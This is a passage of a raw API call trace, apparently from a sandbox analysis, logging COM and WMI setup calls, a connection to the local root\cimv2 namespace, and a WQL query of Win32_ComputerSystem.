	[0263.220] IUnknown:Release (This=0x718dec) returned 0x1
	[0263.220] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee224 | out: ppv=0x5dee224*=0x6361f58) returned 0x0
	[0263.220] WbemDefPath:IUnknown:QueryInterface (in: This=0x6361f58, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee054 | out: ppvObject=0x5dee054*=0x0) returned 0x80004002
	[0263.220] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6361f58, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee08c | out: ppvObject=0x5dee08c*=0x6362088) returned 0x0
	[0263.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x6362088, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede30 | out: ppvObject=0x5dede30*=0x6362088) returned 0x0
	[0263.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x6362088, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddec | out: ppvObject=0x5deddec*=0x0) returned 0x80004002
	[0263.221] WbemDefPath:IUnknown:AddRef (This=0x6362088) returned 0x3
	[0263.222] CoGetContextToken (in: pToken=0x5dedc78 | out: pToken=0x5dedc78) returned 0x0
	[0263.222] WbemDefPath:IUnknown:QueryInterface (in: This=0x6362088, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc60 | out: ppvObject=0x5dedc60*=0x639a118) returned 0x0
	[0263.222] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x639a118, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc68 | out: pCid=0x5dedc68*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.222] WbemDefPath:IUnknown:Release (This=0x639a118) returned 0x3
	[0263.222] CoGetContextToken (in: pToken=0x5dedc70 | out: pToken=0x5dedc70) returned 0x0
	[0263.222] WbemDefPath:IUnknown:AddRef (This=0x6362088) returned 0x4
	[0263.222] WbemDefPath:IUnknown:QueryInterface (in: This=0x6362088, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedce4 | out: ppvObject=0x5dedce4*=0x0) returned 0x80004002
	[0263.222] WbemDefPath:IUnknown:Release (This=0x6362088) returned 0x3
	[0263.223] WbemDefPath:IUnknown:Release (This=0x6362088) returned 0x2
	[0263.223] WbemDefPath:IUnknown:Release (This=0x6361f58) returned 0x0
	[0263.223] WbemDefPath:IUnknown:Release (This=0x6362088) returned 0x1
	[0263.223] CoGetContextToken (in: pToken=0x5dee520 | out: pToken=0x5dee520) returned 0x0
	[0263.223] CoGetContextToken (in: pToken=0x5dee4e0 | out: pToken=0x5dee4e0) returned 0x0
	[0263.223] WbemDefPath:IUnknown:AddRef (This=0x6362088) returned 0x2
	[0263.223] WbemDefPath:IUnknown:QueryInterface (in: This=0x6362088, riid=0x5dee55c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee558 | out: ppvObject=0x5dee558*=0x6362088) returned 0x0
	[0263.223] WbemDefPath:IUnknown:Release (This=0x6362088) returned 0x2
	[0263.223] WbemDefPath:IUnknown:Release (This=0x6362088) returned 0x1
	[0263.223] CoGetContextToken (in: pToken=0x5dee5a0 | out: pToken=0x5dee5a0) returned 0x0
	[0263.223] CoGetContextToken (in: pToken=0x5dee560 | out: pToken=0x5dee560) returned 0x0
	[0263.224] WbemDefPath:IUnknown:AddRef (This=0x6362088) returned 0x2
	[0263.224] WbemDefPath:IUnknown:QueryInterface (in: This=0x6362088, riid=0x5dee5dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5d8 | out: ppvObject=0x5dee5d8*=0x6362088) returned 0x0
	[0263.224] WbemDefPath:IUnknown:Release (This=0x6362088) returned 0x2
	[0263.224] WbemDefPath:IUnknown:AddRef (This=0x6362088) returned 0x3
	[0263.224] WbemDefPath:IWbemPath:SetText (This=0x6362088, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.224] WbemDefPath:IUnknown:Release (This=0x6362088) returned 0x2
	[0263.224] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee744 | out: puCount=0x5dee744*=0x2) returned 0x0
	[0263.224] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee740*=0x0, pszText=0x0 | out: puBuffLength=0x5dee740*=0x17, pszText=0x0) returned 0x0
	[0263.224] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee740*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee740*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.224] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee740 | out: puCount=0x5dee740*=0x2) returned 0x0
	[0263.224] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee73c*=0x0, pszText=0x0 | out: puBuffLength=0x5dee73c*=0x17, pszText=0x0) returned 0x0
	[0263.224] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee73c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee73c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.224] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6bc | out: ppv=0x5dee6bc*=0x718dec) returned 0x0
	[0263.225] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6b4 | out: pAptType=0x5dee6b4*=1) returned 0x0
	[0263.225] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6b8 | out: ppvObject=0x5dee6b8*=0x0) returned 0x80004002
	[0263.225] IUnknown:Release (This=0x718dec) returned 0x1
	[0263.225] CoGetClassObject (in: rclsid=0x7b796c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee50c | out: ppv=0x5dee50c*=0x635dbd8) returned 0x0
	[0263.225] WbemLocator:IUnknown:QueryInterface (in: This=0x635dbd8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee33c | out: ppvObject=0x5dee33c*=0x0) returned 0x80004002
	[0263.225] WbemLocator:IClassFactory:CreateInstance (in: This=0x635dbd8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x6361f58) returned 0x0
	[0263.225] WbemLocator:IUnknown:QueryInterface (in: This=0x6361f58, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee118 | out: ppvObject=0x5dee118*=0x6361f58) returned 0x0
	[0263.226] WbemLocator:IUnknown:QueryInterface (in: This=0x6361f58, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dee0d4 | out: ppvObject=0x5dee0d4*=0x0) returned 0x80004002
	[0263.226] WbemLocator:IUnknown:AddRef (This=0x6361f58) returned 0x3
	[0263.226] CoGetContextToken (in: pToken=0x5dedf60 | out: pToken=0x5dedf60) returned 0x0
	[0263.226] WbemLocator:IUnknown:QueryInterface (in: This=0x6361f58, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedf48 | out: ppvObject=0x5dedf48*=0x0) returned 0x80004002
	[0263.226] CoGetContextToken (in: pToken=0x5dedf58 | out: pToken=0x5dedf58) returned 0x0
	[0263.226] WbemLocator:IUnknown:AddRef (This=0x6361f58) returned 0x4
	[0263.226] WbemLocator:IUnknown:QueryInterface (in: This=0x6361f58, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedfcc | out: ppvObject=0x5dedfcc*=0x0) returned 0x80004002
	[0263.227] WbemLocator:IUnknown:Release (This=0x6361f58) returned 0x3
	[0263.227] WbemLocator:IUnknown:Release (This=0x6361f58) returned 0x2
	[0263.227] WbemLocator:IUnknown:Release (This=0x635dbd8) returned 0x0
	[0263.227] WbemLocator:IUnknown:Release (This=0x6361f58) returned 0x1
	[0263.227] CoGetContextToken (in: pToken=0x5dee464 | out: pToken=0x5dee464) returned 0x0
	[0263.227] CoGetContextToken (in: pToken=0x5dee424 | out: pToken=0x5dee424) returned 0x0
	[0263.227] WbemLocator:IUnknown:AddRef (This=0x6361f58) returned 0x2
	[0263.227] WbemLocator:IUnknown:QueryInterface (in: This=0x6361f58, riid=0x5dee4a0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dee49c | out: ppvObject=0x5dee49c*=0x6361f58) returned 0x0
	[0263.227] WbemLocator:IUnknown:Release (This=0x6361f58) returned 0x2
	[0263.228] WbemLocator:IUnknown:Release (This=0x6361f58) returned 0x1
	[0263.228] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee694 | out: puCount=0x5dee694*=0x2) returned 0x0
	[0263.228] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=8, puBuffLength=0x5dee690*=0x0, pszText=0x0 | out: puBuffLength=0x5dee690*=0x17, pszText=0x0) returned 0x0
	[0263.228] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=8, puBuffLength=0x5dee690*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee690*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.228] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5dee16c | out: ppv=0x5dee16c*=0x635dee8) returned 0x0
	[0263.228] WbemLocator:IWbemLocator:ConnectServer (in: This=0x635dee8, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5dee1b8 | out: ppNamespace=0x5dee1b8*=0x636213c) returned 0x0
	[0263.339] WbemLocator:IUnknown:QueryInterface (in: This=0x636213c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee088 | out: ppvObject=0x5dee088*=0x7f93dc) returned 0x0
	[0263.339] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7f93dc, pProxy=0x636213c, pAuthnSvc=0x5dee0d0, pAuthzSvc=0x5dee0cc, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4, pImpLevel=0x5dee0c0, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8 | out: pAuthnSvc=0x5dee0d0*=0xa, pAuthzSvc=0x5dee0cc*=0x0, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4*=0x6, pImpLevel=0x5dee0c0*=0x2, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8*=0x1) returned 0x0
	[0263.339] WbemLocator:IUnknown:Release (This=0x7f93dc) returned 0x1
	[0263.339] WbemLocator:IUnknown:QueryInterface (in: This=0x636213c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee07c | out: ppvObject=0x5dee07c*=0x7f93fc) returned 0x0
	[0263.339] WbemLocator:IUnknown:QueryInterface (in: This=0x636213c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee078 | out: ppvObject=0x5dee078*=0x7f93dc) returned 0x0
	[0263.339] WbemLocator:IClientSecurity:SetBlanket (This=0x7f93dc, pProxy=0x636213c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0263.339] WbemLocator:IUnknown:Release (This=0x7f93dc) returned 0x2
	[0263.339] WbemLocator:IUnknown:Release (This=0x7f93fc) returned 0x1
	[0263.339] CoTaskMemFree (pv=0x7f84f8) 
	[0263.339] WbemLocator:IUnknown:Release (This=0x635dee8) returned 0x0
	[0263.340] WbemLocator:IUnknown:QueryInterface (in: This=0x636213c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5deda38 | out: ppvObject=0x5deda38*=0x7f93fc) returned 0x0
	[0263.340] WbemLocator:IUnknown:QueryInterface (in: This=0x7f93fc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5ded9f4 | out: ppvObject=0x5ded9f4*=0x0) returned 0x80004002
	[0263.341] WbemLocator:IUnknown:QueryInterface (in: This=0x7f93fc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x0) returned 0x80004002
	[0263.346] WbemLocator:IUnknown:AddRef (This=0x7f93fc) returned 0x3
	[0263.346] CoGetContextToken (in: pToken=0x5ded880 | out: pToken=0x5ded880) returned 0x0
	[0263.346] WbemLocator:IUnknown:QueryInterface (in: This=0x7f93fc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded868 | out: ppvObject=0x5ded868*=0x7f935c) returned 0x0
	[0263.346] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f935c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded870 | out: pCid=0x5ded870*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.346] WbemLocator:IUnknown:Release (This=0x7f935c) returned 0x3
	[0263.347] CoGetContextToken (in: pToken=0x5ded878 | out: pToken=0x5ded878) returned 0x0
	[0263.347] WbemLocator:IUnknown:AddRef (This=0x7f93fc) returned 0x4
	[0263.347] WbemLocator:IUnknown:QueryInterface (in: This=0x7f93fc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8ec | out: ppvObject=0x5ded8ec*=0x7f93e4) returned 0x0
	[0263.347] WbemLocator:IUnknown:Release (This=0x7f93fc) returned 0x4
	[0263.347] WbemLocator:IRpcOptions:Query (in: This=0x7f93e4, pPrx=0x7f93fc, dwProperty=2, pdwValue=0x5ded910 | out: pdwValue=0x5ded910) returned 0x80004002
	[0263.347] WbemLocator:IUnknown:Release (This=0x7f93e4) returned 0x3
	[0263.347] WbemLocator:IUnknown:Release (This=0x7f93fc) returned 0x2
	[0263.347] CoGetContextToken (in: pToken=0x5dedcec | out: pToken=0x5dedcec) returned 0x0
	[0263.348] CoGetContextToken (in: pToken=0x5dedcac | out: pToken=0x5dedcac) returned 0x0
	[0263.348] WbemLocator:IUnknown:AddRef (This=0x7f93fc) returned 0x3
	[0263.348] WbemLocator:IUnknown:QueryInterface (in: This=0x7f93fc, riid=0x5dedd28*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dedd24 | out: ppvObject=0x5dedd24*=0x636213c) returned 0x0
	[0263.348] WbemLocator:IUnknown:Release (This=0x7f93fc) returned 0x3
	[0263.348] WbemLocator:IUnknown:Release (This=0x636213c) returned 0x2
	[0263.348] WbemLocator:IUnknown:Release (This=0x636213c) returned 0x1
	[0263.348] CoGetContextToken (in: pToken=0x5dee608 | out: pToken=0x5dee608) returned 0x0
	[0263.348] WbemLocator:IUnknown:AddRef (This=0x7f93fc) returned 0x2
	[0263.348] WbemLocator:IUnknown:QueryInterface (in: This=0x7f93fc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee22c | out: ppvObject=0x5dee22c*=0x7f93fc) returned 0x0
	[0263.349] WbemLocator:IUnknown:Release (This=0x7f93fc) returned 0x2
	[0263.349] WbemLocator:IUnknown:Release (This=0x7f93fc) returned 0x1
	[0263.349] CoGetContextToken (in: pToken=0x5dede0c | out: pToken=0x5dede0c) returned 0x0
	[0263.349] CoGetContextToken (in: pToken=0x5deddcc | out: pToken=0x5deddcc) returned 0x0
	[0263.349] WbemLocator:IUnknown:AddRef (This=0x7f93fc) returned 0x2
	[0263.349] WbemLocator:IUnknown:QueryInterface (in: This=0x7f93fc, riid=0x5dede48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dede44 | out: ppvObject=0x5dede44*=0x636213c) returned 0x0
	[0263.349] WbemLocator:IUnknown:Release (This=0x7f93fc) returned 0x2
	[0263.349] WbemLocator:IUnknown:AddRef (This=0x636213c) returned 0x3
	[0263.349] IWbemServices:ExecQuery (in: This=0x636213c, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x5dee450 | out: ppEnum=0x5dee450*=0x6365074) returned 0x0
	[0263.385] IUnknown:QueryInterface (in: This=0x6365074, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0fc | out: ppvObject=0x5dee0fc*=0x6365078) returned 0x0
	[0263.385] IClientSecurity:QueryBlanket (in: This=0x6365078, pProxy=0x6365074, pAuthnSvc=0x5dee144, pAuthzSvc=0x5dee140, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148, pImpLevel=0x5dee134, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c | out: pAuthnSvc=0x5dee144*=0xa, pAuthzSvc=0x5dee140*=0x0, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148*=0x6, pImpLevel=0x5dee134*=0x2, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c*=0x1) returned 0x0
	[0263.385] IUnknown:Release (This=0x6365078) returned 0x1
	[0263.385] IUnknown:QueryInterface (in: This=0x6365074, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0f0 | out: ppvObject=0x5dee0f0*=0x7f930c) returned 0x0
	[0263.385] IUnknown:QueryInterface (in: This=0x6365074, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0ec | out: ppvObject=0x5dee0ec*=0x6365078) returned 0x0
	[0263.385] IClientSecurity:SetBlanket (This=0x6365078, pProxy=0x6365074, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0263.390] IUnknown:Release (This=0x6365078) returned 0x2
	[0263.390] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x1
	[0263.390] CoTaskMemFree (pv=0x7f8498) 
	[0263.391] WbemLocator:IUnknown:Release (This=0x636213c) returned 0x2
	[0263.391] IUnknown:QueryInterface (in: This=0x6365074, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedaa8 | out: ppvObject=0x5dedaa8*=0x7f930c) returned 0x0
	[0263.392] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda64 | out: ppvObject=0x5deda64*=0x0) returned 0x80004002
	[0263.393] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded958 | out: ppvObject=0x5ded958*=0x0) returned 0x80004002
	[0263.397] WbemLocator:IUnknown:AddRef (This=0x7f930c) returned 0x3
	[0263.397] CoGetContextToken (in: pToken=0x5ded8f0 | out: pToken=0x5ded8f0) returned 0x0
	[0263.397] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8d8 | out: ppvObject=0x5ded8d8*=0x7f926c) returned 0x0
	[0263.398] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f926c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8e0 | out: pCid=0x5ded8e0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.398] WbemLocator:IUnknown:Release (This=0x7f926c) returned 0x3
	[0263.398] CoGetContextToken (in: pToken=0x5ded8e8 | out: pToken=0x5ded8e8) returned 0x0
	[0263.398] WbemLocator:IUnknown:AddRef (This=0x7f930c) returned 0x4
	[0263.398] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded95c | out: ppvObject=0x5ded95c*=0x7f92f4) returned 0x0
	[0263.398] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x4
	[0263.398] WbemLocator:IRpcOptions:Query (in: This=0x7f92f4, pPrx=0x7f930c, dwProperty=2, pdwValue=0x5ded980 | out: pdwValue=0x5ded980) returned 0x80004002
	[0263.398] WbemLocator:IUnknown:Release (This=0x7f92f4) returned 0x3
	[0263.399] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x2
	[0263.399] CoGetContextToken (in: pToken=0x5dedd5c | out: pToken=0x5dedd5c) returned 0x0
	[0263.399] CoGetContextToken (in: pToken=0x5dedd1c | out: pToken=0x5dedd1c) returned 0x0
	[0263.399] WbemLocator:IUnknown:AddRef (This=0x7f930c) returned 0x3
	[0263.399] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x5dedd98*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedd94 | out: ppvObject=0x5dedd94*=0x6365074) returned 0x0
	[0263.399] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x3
	[0263.399] IUnknown:Release (This=0x6365074) returned 0x2
	[0263.399] IUnknown:Release (This=0x6365074) returned 0x1
	[0263.399] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee6e8 | out: puCount=0x5dee6e8*=0x2) returned 0x0
